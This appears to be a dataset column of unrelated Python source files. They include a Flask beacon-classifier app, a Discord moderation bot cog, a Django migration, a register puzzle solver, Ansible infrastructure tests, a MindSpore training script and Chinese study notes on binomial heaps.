content
stringlengths
5
1.05M
from flask import Flask, request, render_template, url_for, redirect, send_file import helper_functions import db import datetime import celery_app from config import celery_config import classifiers import heatmap app = Flask(__name__) # celery_config(app) # celery = celery_app.make_celery(app) @app.route('/', methods=['GET','POST']) def index(): state = db.get_app_state() label = db.get_app_label() if state == 0: form = render_template('start_app.html', intake=state, label=label) else: form = render_template('stop_app.html', intake=state, label=label) return form @app.route('/startstop', methods=['POST']) def startstop(): if request.form['button'] == 'Start': label = request.form['label'] status = 1 if request.form['button'] == 'Stop': label = None status = 0 db.set_app_state(status, label) return redirect(url_for('index')) @app.route('/intake', methods=['POST']) def intake(): # check if allowed if not db.get_app_state(): return ("app status is 0. Data not processed\n", 403) else: data = request.get_data() db.insert_multiple_messages(data) return (data + '\n', 200) @app.route('/setup_classifier', methods=['POST', 'GET']) def setup_classifier(): return render_template('setup_classifier.html') @app.route('/init_classifier', methods=['POST']) def init_classifier(): # Collect data from request form (ASSUMES IS PROPER DATA) start_date = request.form['start_date'] end_date = request.form['end_date'] beacon_id = request.form['beacon_id'] gateway_list = request.form['gateway_list'] classifier_name = request.form['classifier_name'] # Process Data into correct form to run SVM start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d %H:%M:%S") end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d %H:%M:%S") gateway_list = [whitespace.strip() for whitespace in gateway_list.split(',')] # Train SVM and check results classifier, standardize_scalar = classifiers.create_classifier(beacon_id, gateway_list, start_date, end_date, classifier_name) db.save_classifier(classifier, classifier_name, gateway_list, standardize_scalar) return render_template('use_classifier.html') @app.route('/use_classifier', methods=['POST', 'GET']) def use_classifier(): return render_template('use_classifier.html') @app.route('/predict_classifier', methods=['POST']) def predict_classifier(): # Collect data from request form (ASSUMES IS PROPER DATA) start_date = request.form['start_date'] end_date = request.form['end_date'] beacon_id = request.form['beacon_id'] classifier_name = request.form['classifier_name'] start_date = datetime.datetime.strptime(start_date, "%Y-%m-%d %H:%M:%S") end_date = datetime.datetime.strptime(end_date, "%Y-%m-%d %H:%M:%S") results = classifiers.use_classifier(beacon_id, start_date, end_date, classifier_name) file_name = 'static/test.jpg' heatmap.store_heatmap(beacon_id, start_date, end_date, file_name) return send_file('static/test.jpg') @app.route('/timestamp_matching' , methods=[ 'GET']) def daily_processing(): raise NotImplementedError
import os import sys import time import random import discord from discord.ext import commands from discord.ext import tasks from discord import Member from discord.ext.commands import has_permissions from discord.ext.commands import MissingPermissions from discord.utils import find from discord.utils import get import asyncio import json class Main(commands.Cog): def __init__(self, client): self.client = client @commands.command(pass_context=True) @has_permissions(manage_messages=True) async def purge(self, ctx, arg): author = ctx.message.author.name embed=discord.Embed(title=f"Clearing...", description=f"Clearing {arg}", color=0xf20000) await ctx.send(embed=embed) amount1 = int(arg) time.sleep(1) await ctx.channel.purge(limit=amount1+2) @commands.command(pass_context=True) @has_permissions(kick_members=True) async def kick(self, ctx, user_name:discord.Member, *,args=None): author = ctx.author.name embed=discord.Embed(title="Player Kicked", description=f"**Player:** {user_name} \n**Reason:** {args} \n**Kicked By:** {author}", color=0xf20000) await user_name.kick(reason=args) await ctx.send(embed=embed) @commands.command(pass_context=True) @has_permissions(ban_members=True) async def ban(self, ctx, user_name:discord.Member, *,args=None): author = ctx.author.name embed=discord.Embed(title="Player Banned", description=f"**Player:** {user_name} \n**Reason:** {args} \n**Banned By:** {author}", color=0xf20000) await user_name.ban(reason=args) await ctx.send(embed=embed) @commands.command(pass_context=True) @has_permissions(ban_members=True) async def softban(self, ctx, user_name:discord.Member, *,args=None): await user_name.ban(reason=None) await asyncio.sleep(5) await user_name.unban(reason=None) @commands.command(pass_context=True) @has_permissions(kick_members=True) async def mute(self, ctx, user_name:discord.Member, args=None): # 683197335429316644 author = ctx.author.name role = discord.utils.get(user_name.guild.roles, name="Muted") await Member.add_roles(user_name, role) embed=discord.Embed(title="Player Muted", description=f"**Player:** {user_name} \n**Reason:** {args} \n**Muted By:** {author}", color=0xf20000) await ctx.send(embed=embed) @commands.command() @has_permissions(administrator=True) async def strike(self, ctx, faction, *,args): author = ctx.message.author.name author_id = ctx.message.author.id strike_channel = self.client.get_channel(727435494555910265) with open("/root/DiscordGit/Corrupt/cogs/db_faction.json", "r") as f: factions = json.load(f) target = str(faction) if not f'{target}' in factions: factions[f'{target}'] = {} factions[f'{target}'] = 1 embed=discord.Embed(title="Faction Strike", description=f"**Striked:** {faction} \n**Reason:** {args} \n**Total Strikes:** 1 \n**Strike By:** {author}", color=0xf20000) await strike_channel.send(embed=embed) else: warnam = int(factions[f'{target}']) warnam += 1 factions[f'{target}'] = warnam embed=discord.Embed(title="Faction Strike", description=f"**Striked:** {faction} \n**Reason:** {args} \n**Total Strikes:** {warnam} \n**Strike By:** {author}", color=0xf20000) await strike_channel.send(embed=embed) with open("db_faction.json", "w") as f: json.dump(factions, f) @commands.command(pass_context=True) @has_permissions(administrator=True) async def fire(self, ctx, user_name:discord.Member, *,args=None): for i in user_name.guild.roles: try: role = discord.utils.get(user_name.guild.roles, name=str(i)) await Member.remove_roles(user_name, role) except: pass pass member_role = discord.utils.get(user_name.guild.roles, name="Member") await Member.add_roles(user_name, member_role) await user_name.edit(nick=None) embed=discord.Embed(title=f"Fired {user_name}", description=f"{user_name} has been striped of all roles") await ctx.send(embed=embed) def setup(client): client.add_cog(Main(client))
# Generated by Django 3.2.10 on 2022-01-31 11:08 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('crudapp', '0077_auto_20220131_1549'), ] operations = [ migrations.AlterField( model_name='atm', name='inBankProcessing', field=models.IntegerField(choices=[(0, 'Внешний процессинг'), (1, 'Внутренний процессинг')], default=0, verbose_name='Процессинговый центр'), ), migrations.AlterField( model_name='atmimage', name='title', field=models.CharField(default='atm_img_20220131_16-08-50', max_length=200, null=True), ), migrations.AlterField( model_name='atmmodel', name='image', field=models.ImageField(blank=True, null=True, upload_to='model/model_img_20220131_16-08-50', verbose_name='Изображение'), ), ]
#!/usr/bin/python3 import sys # I heard you like registers # instructions have parts: # - register to modify # - whether to increase or decrease # - amount to change by # - 'if' # - register to check # - comparison operator # - amount to compare against # 'b inc 5 if a > 1' - check a, if greater than 1, add 5 to b def getValue(registers, name): if name not in registers: registers[name] = 0 return registers[name] def setValue(registers, name, value): registers[name] = value def addValue(registers, name, value): setValue(registers, name, getValue(registers, name) + value) def subValue(registers, name, value): setValue(registers, name, getValue(registers, name) - value) dirCase = { 'inc': addValue, 'dec': subValue, } def greaterThan(registers, a, b): return getValue(registers, a) > b def lessThan(registers, a, b): return getValue(registers, a) < b def equalTo(registers, a, b): return getValue(registers, a) == b def greaterThanEqualTo(registers, a, b): return not lessThan(registers, a, b) def lessThanEqualTo(registers, a, b): return not greaterThan(registers, a, b) def notEqualTo(registers, a, b): return not equalTo(registers, a, b) opCase = { '>': greaterThan, '<': lessThan, '==': equalTo, '>=': greaterThanEqualTo, '<=': lessThanEqualTo, '!=': notEqualTo, } # what is the largest amount in any register at any time? def largestValue(instructions): registers = {} value = "lame" for instruction in instructions: target, dir, mag, ifword, check, op, comp = instruction.split() if opCase[op](registers, check, int(comp)): dirCase[dir](registers, target, int(mag)) if value == "lame" or getValue(registers, target) > value: value = getValue(registers, target) return value # Unit tests for largestValue. tt = {'x': (['b inc 5 if a > 1', 'a inc 1 if b < 5', 'c dec -10 if a >= 1', 'c inc -20 if c == 10'], 10)} for k, v in tt.items(): result = largestValue(v[0]) if result != v[1]: print("FAIL: input ", v[0], ": expected ", v[1], ", got ", result, sep="") # The input is not checked for sanity, just existence. instructions = sys.stdin.readlines() if len(instructions) == 0: print("instructions missing!") sys.exit(1) print(largestValue(instructions))
import pytest @pytest.fixture(scope="module") def ansible_vars(host): return host.ansible.get_variables() def test_correct_package_versions_are_installed(host, ansible_vars): indy_node = host.package('indy-node') indy_plenum = host.package('indy-plenum') python_indy_crypto = host.package('python3-indy-crypto') libindy_crypto = host.package('libindy-crypto') assert indy_node.is_installed assert indy_plenum.is_installed assert python_indy_crypto.is_installed assert libindy_crypto.is_installed assert indy_node.version == ansible_vars['indy_node_ver'] assert indy_plenum.version == ansible_vars['indy_plenum_ver'] assert python_indy_crypto.version == ansible_vars['python_indy_crypto_ver'] assert libindy_crypto.version == ansible_vars['libindy_crypto_ver'] def test_node_service_is_enabled(host): assert host.service('indy-node').is_enabled
#-*- coding: utf-8 -*- import os import re import random def get_captcha(): path = os.path.join(os.path.dirname(__file__), 'captcha', 'jpgs/') file_list = get_file(path) uuid = re.findall("ques(.*?).jpg", file_list[random.randint(0, len(file_list)-1)])[0] answer = get_answer(uuid) return [uuid, answer[4]] def get_answer(uuid): path = os.path.join(os.path.dirname(__file__), 'captcha', 'ans/') filename = path+'ans'+uuid+'.txt' f = open(filename, 'r') answer = f.read() answer = re.findall('= (.*?)\\n', answer) return answer def get_file(path): for root, dir, filename in os.walk(path): file_list = filename return file_list def check_captcha(x, y, uuid): answer = get_answer(uuid) if(float(answer[0]) <= float(x) <= float(answer[0])+float(answer[2])): if(float(answer[1]) <= float(y) <= float(answer[1])+float(answer[3])): return True return False
# coding: utf-8 """ Base Parser =========== Base class of parsers. """ from lxml import etree class BaseParser(object): """ Abstract base class of the parsers classes. """ class _State(object): """ Parsing state for the converter (internal usage). .. versionadded:: 0.4.4 .. versionadded:: 0.5.0 """ def __init__(self): self.col_pos = 0 self.col = None self.row_pos = 0 self.row = None self.table = None reset = __init__ def next_col(self): self.col_pos += 1 self.col = None def next_row(self): self.col_pos = 0 self.col = None self.row_pos += 1 self.row = None def __init__(self, builder, encoding="utf-8", **options): """ Construct a base builder. :type builder: benker.builders.base_builder.BaseBuilder :param builder: Builder used by this parser to instantiate :class:`~benker.table.Table` objects. :param str encoding: XML encoding of the destination file (default: "utf-8"). :keyword options: Extra conversion options. See :meth:`~benker.converters.base_converter.BaseConverter.convert_file` to have a list of all possible options. """ self.builder = builder self.encoding = encoding self.options = options self._state = self._State() def parse_file(self, src_xml, dst_xml): """ Parse and convert the tables from one format to another. :param str src_xml: Source path of the XML file to convert. :param str dst_xml: Destination path of the XML file to produce. .. versionchanged:: 0.5.0 Always generate the XML declaration in the destination file. """ tree = etree.parse(src_xml) self.transform_tables(tree) self.builder.finalize_tree(tree) tree.write(dst_xml, xml_declaration=True, encoding=self.encoding, pretty_print=False) def transform_tables(self, tree): raise NotImplementedError def value_of(element, xpath, namespaces=None, default=None): """ Take the first value of a xpath evaluation. :type element: etree._Element :param element: Root element used to evaluate the xpath expression. :param str xpath: xpath expression. This expression will be evaluated using the *namespaces* namespaces. :type namespaces: dict[str, str] :param namespaces: Namespace map to use for the xpath evaluation. :param default: default value used if the xpath evaluation returns no result. :return: the first result or the *default* value. """ if element is None: return default nodes = element.xpath(xpath, namespaces=namespaces) return nodes[0] if nodes else default
# Copyright 2020 Huawei Technologies Co., Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================ """Training Interface""" import sys import os import argparse import copy from mindspore.communication.management import init, get_rank, get_group_size from mindspore.context import ParallelMode from mindspore.train.model import Model from mindspore.train.callback import TimeMonitor from mindspore.train.serialization import load_checkpoint, load_param_into_net from mindspore.train.loss_scale_manager import FixedLossScaleManager from mindspore.nn import SGD, RMSProp, Loss, Top1CategoricalAccuracy, \ Top5CategoricalAccuracy from mindspore import context, Tensor from src.dataset import create_dataset, create_dataset_val from src.utils import add_weight_decay, count_params, str2bool, get_lr from src.callback import EmaEvalCallBack, LossMonitor from src.loss import LabelSmoothingCrossEntropy from src.tinynet import tinynet parser = argparse.ArgumentParser(description='Training') # training parameters parser.add_argument('--data_path', type=str, default="", metavar="DIR", help='path to dataset') parser.add_argument('--model', default='tinynet_c', type=str, metavar='MODEL', help='Name of model to train (default: "tinynet_c"') parser.add_argument('--num-classes', type=int, default=1000, metavar='N', help='number of label classes (default: 1000)') parser.add_argument('-b', '--batch-size', type=int, default=32, metavar='N', help='input batch size for training (default: 32)') parser.add_argument('--drop', type=float, default=0.0, metavar='DROP', help='Dropout rate (default: 0.)') parser.add_argument('--drop-connect', type=float, default=0.0, metavar='DROP', help='Drop connect rate (default: 0.)') parser.add_argument('--opt', default='sgd', type=str, metavar='OPTIMIZER', help='Optimizer (default: "sgd"') parser.add_argument('--opt-eps', default=1e-8, type=float, metavar='EPSILON', help='Optimizer Epsilon (default: 1e-8)') parser.add_argument('--momentum', type=float, default=0.9, metavar='M', help='SGD momentum (default: 0.9)') parser.add_argument('--weight-decay', type=float, default=0.0001, help='weight decay (default: 0.0001)') parser.add_argument('--lr', type=float, default=0.01, metavar='LR', help='learning rate (default: 0.01)') parser.add_argument('--warmup-lr', type=float, default=0.0001, metavar='LR', help='warmup learning rate (default: 0.0001)') parser.add_argument('--epochs', type=int, default=200, metavar='N', help='number of epochs to train (default: 2)') parser.add_argument('--decay-epochs', type=float, default=30, metavar='N', help='epoch interval to decay LR') parser.add_argument('--warmup-epochs', type=int, default=3, metavar='N', help='epochs to warmup LR, if scheduler supports') parser.add_argument('--decay-rate', '--dr', type=float, default=0.1, metavar='RATE', help='LR decay rate (default: 0.1)') parser.add_argument('--smoothing', type=float, default=0.1, help='label smoothing (default: 0.1)') parser.add_argument('--ema-decay', type=float, default=0, help='decay factor for model weights moving average \ (default: 0.999)') parser.add_argument('--amp_level', type=str, default='O0') parser.add_argument('--per_print_times', type=int, default=100) # batch norm parameters parser.add_argument('--bn-tf', action='store_true', default=False, help='Use Tensorflow BatchNorm defaults for models that \ support it (default: False)') parser.add_argument('--bn-momentum', type=float, default=None, help='BatchNorm momentum override (if not None)') parser.add_argument('--bn-eps', type=float, default=None, help='BatchNorm epsilon override (if not None)') # parallel parameters parser.add_argument('-j', '--workers', type=int, default=4, metavar='N', help='how many training processes to use (default: 1)') parser.add_argument('--distributed', action='store_true', default=False) parser.add_argument('--dataset_sink', action='store_true', default=True) # checkpoint config parser.add_argument('--ckpt', type=str, default=None) parser.add_argument('--ckpt_save_epoch', type=int, default=1) parser.add_argument('--loss_scale', type=int, default=1024, help='static loss scale') parser.add_argument('--train', type=str2bool, default=1, help='train or eval') parser.add_argument('--GPU', action='store_true', default=False, help='Use GPU for training (default: False)') if __name__ == '__main__': args = parser.parse_args() print(sys.argv) devid, args.rank_id, args.rank_size = 0, 0, 1 context.set_context(mode=context.GRAPH_MODE) if args.GPU: context.set_context(device_target='GPU') if args.distributed: if args.GPU: init("nccl") else: init() devid = int(os.getenv('DEVICE_ID')) context.set_context(device_target='Ascend', device_id=devid, reserve_class_name_in_scope=False) context.reset_auto_parallel_context() args.rank_id = get_rank() args.rank_size = get_group_size() context.set_auto_parallel_context(parallel_mode=ParallelMode.DATA_PARALLEL, gradients_mean=True, device_num=args.rank_size) is_master = not args.distributed or (args.rank_id == 0) # parse model argument assert args.model.startswith("tinynet"), "Only Tinynet models are supported." _, sub_name = args.model.split("_") net = tinynet(sub_model=sub_name, num_classes=args.num_classes, drop_rate=args.drop, drop_connect_rate=args.drop_connect, global_pool="avg", bn_tf=args.bn_tf, bn_momentum=args.bn_momentum, bn_eps=args.bn_eps) if is_master: print("Total number of parameters:", count_params(net)) # input image size of the network input_size = net.default_cfg['input_size'][1] train_dataset = val_dataset = None train_data_url = os.path.join(args.data_path, 'train') val_data_url = os.path.join(args.data_path, 'val') val_dataset = create_dataset_val(args.batch_size, val_data_url, workers=args.workers, distributed=False, input_size=input_size) if args.train: train_dataset = create_dataset(args.batch_size, train_data_url, workers=args.workers, distributed=args.distributed, input_size=input_size) batches_per_epoch = train_dataset.get_dataset_size() loss = LabelSmoothingCrossEntropy(smooth_factor=args.smoothing, num_classes=args.num_classes) time_cb = TimeMonitor(data_size=batches_per_epoch) loss_scale_manager = FixedLossScaleManager(args.loss_scale, drop_overflow_update=False) lr_array = get_lr(base_lr=args.lr, total_epochs=args.epochs, steps_per_epoch=batches_per_epoch, decay_epochs=args.decay_epochs, decay_rate=args.decay_rate, warmup_epochs=args.warmup_epochs, warmup_lr_init=args.warmup_lr, global_epoch=0) lr = Tensor(lr_array) loss_cb = LossMonitor(lr_array, args.epochs, per_print_times=args.per_print_times, start_epoch=0) param_group = add_weight_decay(net, weight_decay=args.weight_decay) if is_master: print(f'Using {args.opt} optimizer') if args.opt == 'sgd': optimizer = SGD(param_group, learning_rate=lr, momentum=args.momentum, weight_decay=args.weight_decay, loss_scale=args.loss_scale) elif args.opt == 'rmsprop': optimizer = RMSProp(param_group, learning_rate=lr, decay=0.9, weight_decay=args.weight_decay, momentum=args.momentum, epsilon=args.opt_eps, loss_scale=args.loss_scale) loss.add_flags_recursive(fp32=True, fp16=False) eval_metrics = {'Validation-Loss': Loss(), 'Top1-Acc': Top1CategoricalAccuracy(), 'Top5-Acc': Top5CategoricalAccuracy()} if args.ckpt: ckpt = load_checkpoint(args.ckpt) load_param_into_net(net, ckpt) net.set_train(False) model = Model(net, loss, optimizer, metrics=eval_metrics, loss_scale_manager=loss_scale_manager, amp_level=args.amp_level) net_ema = copy.deepcopy(net) net_ema.set_train(False) assert args.ema_decay > 0, "EMA should be used in tinynet training." ema_cb = EmaEvalCallBack(network=net, ema_network=net_ema, loss_fn=loss, eval_dataset=val_dataset, decay=args.ema_decay, save_epoch=args.ckpt_save_epoch, dataset_sink_mode=args.dataset_sink, start_epoch=0) callbacks = [loss_cb, ema_cb, time_cb] if is_master else [] if is_master: print("Training on " + args.model + " with " + str(args.num_classes) + " classes") model.train(args.epochs, train_dataset, callbacks=callbacks, dataset_sink_mode=args.dataset_sink)
from .la import TDMA_LU, TDMA_Solve, PDMA_LU, PDMA_Solve, \ LU_Helmholtz, Solve_Helmholtz, LU_Biharmonic, Biharmonic_factor_pr, \ Biharmonic_Solve, TDMA_O_Solve, TDMA_O_LU, Poisson_Solve_ADD, \ FDMA_Solve, TwoDMA_Solve, FDMA_LU, DiagMA_Solve, \ TDMA_inner_solve, TDMA_O_inner_solve, DiagMA_inner_solve, \ PDMA_inner_solve, FDMA_inner_solve, TwoDMA_inner_solve, \ SolverGeneric1ND_solve_data from .Matvec import Helmholtz_matvec, Helmholtz_Neumann_matvec, Biharmonic_matvec from .outer import outer2D, outer3D from .applymask import apply_mask from .Cheb import chebval
# -*- coding: utf-8 -*- class TaxiException(Exception): pass class UsageError(TaxiException): pass class CancelException(TaxiException): pass class UndefinedAliasError(TaxiException): pass
# coding:utf-8 # usr/bin/python3 # python src/chapter19/chapter19note.py # python3 src/chapter19/chapter19note.py ''' Class Chapter19_1 Class Chapter19_2 ''' from __future__ import absolute_import, division, print_function import math as _math import random as _random import time as _time from copy import copy as _copy from copy import deepcopy as _deepcopy from random import randint as _randint import numpy as np from numpy import arange as _arange from numpy import array as _array from numpy import * if __name__ == '__main__': import binomialheap as bh else: from . import binomialheap as bh class Chapter19_1: ''' chpater19.1 note and function ''' def note(self): ''' Summary ==== Print chapter19.1 note Example ==== ```python Chapter19_1().note() ``` ''' print('chapter19.1 note as follow') print('第19章 二项堆') # !可合并堆(包括二叉堆、二项堆、斐波那契堆)的数据结构,这些数据结构支持下面五种操作 print('可合并堆(包括二叉堆、二项堆、斐波那契堆)的数据结构,这些数据结构支持下面五种操作') print('MAKE-HEAP():创建并返回一个不包含任何元素的新堆') print('INSERT(H,x):将结点x(其关键字域中已填入了内容)插入堆H中') print('MINIMUM(H):返回一个指向堆H中包含最小关键字的结点的指针') print('EXTRACT-MIN(H):将堆H中包含的最小关键字删除,并返回一个指向该结点的指针') print('UNION(H1,H2):创建并返回一个包含堆H1和H2中所有结点的新堆。同时H1和H2被这个操作\"删除\"') print('DECREASE-KEY(H, x, k):将新关键字值k(假定它不大于当前的关键字值)赋给堆H中的结点x') print('DELETE(H, x):从堆H中删除结点x') print(' 过程 |二叉堆(最坏情况)|二项堆(最坏情况)|斐波那契堆(平摊)|') print(' MAKE-HEAP() | Θ(1) | Θ(1) | Θ(1) |') print(' INSERT(H,x) | Θ(lgn) | Ω(lgn) | Θ(1) |') print(' MINIMUM(H) | Θ(1) | Ω(lgn) | Θ(1) |') print(' EXTRACT-MIN(H)| Θ(lgn) | Θ(lgn) | O(lgn) |') print(' UNION(H1,H2) | Θ(n) | Ω(lgn) | Θ(1) |') print(' DECREASE-KEY | Θ(lgn) | Θ(lgn) | Θ(1) |') print(' DELETE(H, x) | Θ(lgn) | Θ(lgn) | O(lgn) |') print('对操作SEARCH操作的支持方面看,二叉堆、二项堆、斐波那契堆都是低效的') print('19.1 二项树和二项堆') print('19.1.1 二项树') # !二项树Bk是一种递归定义的树。 print('二项树Bk是一种递归定义的树。') # !二项树B0只含包含一个结点。二项树Bk由两颗二项树Bk-1链接而成:其中一棵树的根的是另一棵树的根的最左孩子 print('二项树B0只含包含一个结点。二项树Bk由两颗二项树Bk-1链接而成:其中一棵树的根的是另一棵树的根的最左孩子') print('引理19.1(二项树的性质) 二项树Bk具有以下的性质') print('1) 共有2^k个结点') print('2) 树的高度为k') print('3) 在深度i处恰有(k i)个结点,其中i=0,1,2,...,k') print('4) 根的度数为k,它大于任何其他结点的度数;', '并且,如果根的子女从左到右编号为k-1,k-2,...,0,子女i是子树Bi的根') print('推论19.2 在一棵包含n个结点的二项树中,任意结点的最大度数为lgn') print('19.1.2 二项堆') print('二项堆H由一组满足下面的二项堆性质的二项树组成') print('(1) H中的每个二项树遵循最小堆性质:', '结点的关键字大于或等于其父结点的关键字,我们说这种树是最小堆有序的') print('(2) 对任意非负整数k,在H中至多有一棵二项树的根具有度数k') print('在一棵最小堆有序的二项树中,其根包含了树中最小的关键字') print('在包含n个结点的二项堆H中,包含至多[lgn]+1棵二项树') print('这样,二项堆H包含至多[lgn]+1棵二项树') print('包含13个结点的二项堆H。13的二进制表示为1101,', '故H包含了最小堆有序二项树B3,B2和B0,它们分别有8,4,1个结点,即共有13个结点') print('二项堆的表示') print(' 在二项堆的每个结点中,都有一个关键字域及其其他依应用要求而定的卫星数据') print(' 另外,每个结点x还包含了指向其父结点的指针p[x],指向其最做孩子的指针child[x]') print(' 以及指向x的紧右兄弟的指针sibling[x].如果结点x是根,则p[x]=None') print(' 如果结点x没有子女,则child[x]=None,如果x是其父结点的最右孩子,则sibling[x]=None') print(' 如果结点x是根,则p[x]=None,如果结点x没有子女,', '则child[x]=None,如果x是其父结点的最右孩子,', '则sibling[x]=None,每个结点x都包含域degree[x],即x的子女个数') print('一个二项堆中的各二项树被组织成一个链表,我们称之为根表。') print('在遍历根表时,各根的度数是严格递增的') print('根据第二个二项堆的性质,在一个n结点的二项堆中各根的度数构成了{0,1,...,[lgn]}的一个子集') print('对根结点来说与非结点根来说,sibling域的含义是不同的,如果x为根,则x.sibling指向根表中下一个根') print('像通常一样,如果x为根表中最后一个根,则x.sibling=None') print('练习19.1-1 假设x为一个二项堆中,某棵二项树中的一个结点,并假定sibling[x]!=None') print(' 如果x不是根,x.sibling.degree比x.degree多1,', '如果x是个根,则x.sibling.degree比x.degree多至少1,因为需要知道二项堆的二项树组成结构') print('练习19.1-2 如果x是二项堆的某棵二项树的非根结点,x.p.degree比x.degree大至多O(n)') print('练习19.1-3 假设一棵二项树Bk中的结点标为二进制形式。考虑深度i处标为l的一个结点x,且设j=k-i.') print(' 证明:在x的二进制表示中共有j个1.恰好包含j个1的二进制k串共有多少?', '证明x的度数与l的二进制表示中,最右0的右边的1的个数相同') # python src/chapter19/chapter19note.py # python3 src/chapter19/chapter19note.py class Chapter19_2: ''' chpater19.2 note and function ''' def buildheap(self): ''' 构造19.2-2的形式二项堆 ''' heap = bh.BinomialHeap() root1 = bh.BinomialHeapNode(25, 0) # 根结点 heap.head = root1 root2 = bh.BinomialHeapNode(12, 2) root3 = bh.BinomialHeapNode(6, 4) heap.head.sibling = root2 root2.sibling = root3 root2.child = bh.BinomialHeapNode(37, 1, root2) root2.child.sibling = bh.BinomialHeapNode(18, 0, root2) root2.child.child = bh.BinomialHeapNode( 41, 0, root2.child) root3.child = bh.BinomialHeapNode(10, 3, root3) root3.child.sibling = bh.BinomialHeapNode(8, 2, root3) root3.child.sibling.sibling = bh.BinomialHeapNode(14, 1, root3) root3.child.sibling.sibling.sibling = bh.BinomialHeapNode(29, 0, root3) node = root3.child node.child = bh.BinomialHeapNode(16, 2, node) node.child.sibling = bh.BinomialHeapNode(28, 1, node) node.child.sibling.sibling = bh.BinomialHeapNode(13, 0, node) node = root3.child.sibling node.child = bh.BinomialHeapNode(11, 1, node) node.child.sibling = bh.BinomialHeapNode(17, 0, node) node.child.child = bh.BinomialHeapNode(27, 0, node.child) node = root3.child.sibling.sibling node.child = bh.BinomialHeapNode(38, 0, node) node = root3.child.child node.child = bh.BinomialHeapNode(26, 1, node) node.child.sibling = bh.BinomialHeapNode(23, 0, node) node.child.child = bh.BinomialHeapNode(42, 0, node.child) node = root3.child.child.sibling node.child = bh.BinomialHeapNode(77, 0, node) return heap def note(self): ''' Summary ==== Print chapter19.2 note Example ==== ```python Chapter19_2().note() ``` ''' print('chapter19.2 note as follow') print('19.2 对二项堆的操作') print('创建一个新二项堆') print(' 为了构造一个空的二项堆') print('寻找最小关键字') print(' 过程BINOMIAL-HEAP-MINIMUM返回一个指针,', '指向包含n个结点的二项堆H中具有最小关键字的结点', '这个实现假设没有一个关键字为无穷') print(' 因为一个二项堆是最小堆有序的,故最小关键字必在根结点中') print(' 过程BINOMIAL-HEAP-MINIMUM检查所有的根(至多[lgn]+1),将当前最小者存于min中') print(' 而将指向当前最小者的指针存于y之中。BINOMIAL-HEAP-MINIMUM返回一个指向具有关键字1的结点的指针') print(' 因为至多要检查[lgn]+1个根,所以BINOMIAL-HEAP-MINIMUM的运行时间为O(lgn)') print('合并两个二项堆') print(' 合并两个二项堆的操作可用作后面大部分操作的一个子程序。') print(' 过程BINOMIAL-HEAP-UNION反复连接根结点的度数相同的各二项树') print(' LINK操作将以结点y为根的Bk-1树与以结点z为根的Bk-1树连接起来') print(' BINOMIAL-HEAP-UNION搓成合并H1和H2并返回结果堆,在合并过程中,同时也破坏了H1和H2的表示') print(' 还使用了辅助过程BINOMIAL-HEAP-MERGE,来讲H1和H2的根表合并成一个按度数的单调递增次序排列的链表') print('练习19.2-1 写出BINOMIAL-HEAP-MERGE的伪代码 代码已经给出') heap = bh.BinomialHeap() heap = heap.insertkey(1) heap = heap.insertkey(2) heap = heap.insertkey(3) print(heap.head) print('练习19.2-2 将关键字24的结点插入如图19-7d的二项树当中') heap = self.buildheap() print(heap.head) heap = heap.insertkey(24) print(heap.head) print(' 所得结果二项堆就是24变成了头结点,25变成24的子结点') heap = heap.deletekey(28) print('练习19.2-3 删除28关键字整个二项堆结构与原来很不相同') print('练习19.2-4 讨论使用如下循环不变式BINOMIAL-HEAP-UNION的正确性') print(' x指向下列之一的根') print(' 1.该度数下唯一的根') print(' 2.该度数下仅有两根中的第一个') print(' 3.该度数下仅有三个根中的第一或第二个') print('练习19.2-5 如果关键字的值可以是无穷,为什么过程BINOMIAL-HEAP-MINIMUM可能无法工作') print('练习19.2-6 假设无法表示出关键字负无穷') print(' 重写BINOMIAL-HEAP-DELETE过程,使之在这种情况下能正确地工作,运行时间仍然为O(lgn)') print('练习19.2-7 类似的') print(' 讨论二项堆上的插入与一个二进制数增值的关系') print(' 合并两个二项堆与将两个二进制数相加之间的关系') print('练习19.2-8 略') print('练习19.2-9 证明:如果将根表按度数排成严格递减序(而不是严格递增序)保存') print(' 仍可以在不改变渐进运行时间的前提下实现每一种二项堆操作') print('练习19.2-10 略') print('思考题19-1 2-3-4堆') print(' 2-3-4树,其中每个内结点(非根可能)有两个、三个或四个子女,且所有的叶结点的深度相同') print(' 2-3-4堆与2-3-4树有些不同之处。在2-3-4堆中,关键字仅存在于叶结点中,', '且每个叶结点x仅包含一个关键字于其x.key域中') print(' 另外,叶结点中的关键字之间没有什么特别的次序;亦即,从左至右看,各关键字可以排成任何次序') print(' 每个内结点x包含一个值x.small,它等于以x为根的子树的各叶结点中所存储的最小关键字') print(' 根r包含了一个r.height域,即树的高度。最后,2-3-4堆主要是在主存中的,故无需任何磁盘读写') print(' 2-3-4堆应该包含如下操作,其中每个操作的运行时间都为O(lgn)') print(' (a) MINIMUM,返回一个指向最小关键字的叶结点的指针') print(' (b) DECREASE-KEY,将某一给定叶结点x的关键字减小为一个给定的值k<=x.key') print(' (c) INSERT,插入具有关键字k的叶结点x') print(' (d) DELETE,删除一给定叶结点x') print(' (e) EXTRACT-MIN,抽取具有最小关键字的叶结点') print(' (f) UNION,合并两个2-3-4堆,返回一个2-3-4堆并破坏输入堆') print('思考题19-2 采用二项堆的最小生成树算法') print(' 第23章要介绍两个在无向图中寻找最小生成树的算法') print(' 可以利用二项堆来设计一个不同的最小生成树算法') print(' 请说明如何用二项堆来实现此算法,以便管理点集合边集。需要对二项堆的表示做改变嘛') # python src/chapter19/chapter19note.py # python3 src/chapter19/chapter19note.py chapter19_1 = Chapter19_1() chapter19_2 = Chapter19_2() def printchapter19note(): ''' print chapter19 note. ''' print('Run main : single chapter nineteen!') chapter19_1.note() chapter19_2.note() # python src/chapter19/chapter19note.py # python3 src/chapter19/chapter19note.py if __name__ == '__main__': printchapter19note() else: pass
